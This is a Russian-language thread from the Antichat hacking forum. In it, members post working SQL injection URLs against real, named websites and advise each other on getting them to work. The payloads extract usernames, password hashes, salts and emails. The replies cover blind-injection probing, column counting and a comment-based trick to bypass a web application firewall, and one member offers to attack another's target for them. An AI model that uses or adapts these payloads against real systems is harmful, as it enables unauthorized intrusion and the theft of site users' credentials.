Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.01.2010, 00:51
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от KNR
Код:
localhost/index.php?modul=char&id=1062197)+and+1=(select+*+from(select+*+from(select+name_const((select+concat(username,0x3a,sha_pass_hash,0x3a,gmlevel,0x3a,email)+from+realmd.account+where+id=12),14)d)+as+t+join+(select+name_const((select+concat(username,0x3a,sha_pass_hash,0x3a,gmlevel,0x3a,email)+from+realmd.account+where+id=12),14)e)b)a)--+
Чем можно заменить name_const ?
Код:
Notice: Incorrect arguments to NAME_CONST in /var/www/web3/web/modules/char.php on line 8
пишет
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
07.01.2010, 02:04
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517
Репутация:
334
|
|
Код:
http://www.pimaair.org/collection-detail.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
хз,что делать.=\ Не раскрутить. Посмотрите плз,что сделать в данной ситуации можно... |
|
|
|
07.01.2010, 02:16
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
как слепую
Код:
http://www.pimaair.org/collection-detail.php?cid=1+and+substring(version(),1,1)=4
|
|
|
|
07.01.2010, 03:35
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517
Репутация:
334
|
|
ага,спс.
|
|
|
|
07.01.2010, 13:34
|
|
Познающий
Регистрация: 18.09.2006
Сообщений: 43
Провел на форуме:
468989
Репутация:
3
|
|
есть сайт!выдает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near.
Пробу.1+order+by+50000000000000000000/*Все что до этого числа выдается ошибкой.Unknown column '5000000000000000000' in 'order clause'Это как понять?это чё столько полей??
|
|
|
|
07.01.2010, 13:46
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от street16
есть сайт!выдает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near.
Пробу.1+order+by+50000000000000000000/*Все что до этого числа выдается ошибкой.Unknown column '5000000000000000000' in 'order clause'Это как понять?это чё столько полей??
Полей меньше, подбирай число, пока ошибки нет.
|
|
|
|
07.01.2010, 13:58
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от street16
есть сайт!выдает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near.
Пробу.1+order+by+50000000000000000000/*Все что до этого числа выдается ошибкой.Unknown column '5000000000000000000' in 'order clause'Это как понять?это чё столько полей??
Слишком уж много ты полей поставил  Ссылку кинь, раскрутим
|
|
|
|
07.01.2010, 14:27
|
|
Познающий
Регистрация: 18.09.2006
Сообщений: 43
Провел на форуме:
468989
Репутация:
3
|
|
Сообщение от mailbrush
Слишком уж много ты полей поставил Ссылку кинь, раскрутим Просто мой первый ресурс.Хотелось бы самому!
Да все уже перепробывал все что до этого числа идет ошибка!
|
|
|
|
07.01.2010, 15:08
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
А что делать когда на сервере стоит WAFF, но ни один способ описанный в "Web_Application_Firewall.ppt" не пашет?
Пример:
Код:
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+null,null,null,5,concat_ws(0x3a,name,password,pass_salt),null,null,null,null+from+novaboard_members+where+id=1+--+
Так выглядит боевой запрос, который точно должен сработать, но из за WAFF`a не пахает. И ничё нельзя сделать, а если правильнее, то я ничего не смог сделать.
И так по всюду, а точнее на куче сайтов, учитывая то, что с методами обхода WAFF я как бы ознакомился немножко...
Хотя что то мне подсказывает, что помимо него ещё и существует .htaccess со своими регулярными выражениями... |
|
|
|
07.01.2010, 15:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от Nightmarе
А что делать когда на сервере стоит WAFF, но ни один способ описанный в "Web_Application_Firewall.ppt" не пашет?
Пример:
Код:
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+null,null,null,5,concat_ws(0x3a,name,password,pass_salt),null,null,null,null+from+novaboard_members+where+id=1+--+
Так выглядит боевой запрос, который точно должен сработать, но из за WAFF`a не пахает. И ничё нельзя сделать, а если правильнее, то я ничего не смог сделать.
И так по всюду, а точнее на куче сайтов, учитывая то, что с методами обхода WAFF я как бы ознакомился немножко...
Хотя что то мне подсказывает, что помимо него ещё и существует .htaccess со своими регулярными выражениями... значит плохо смотрел )
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&auth or_id=1&forums[]=1)/*!union*/select+1,2,3,4,concat_ws(0x3a,name,password,pass_s alt),6,7,8,9+from+forum_members--+1
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
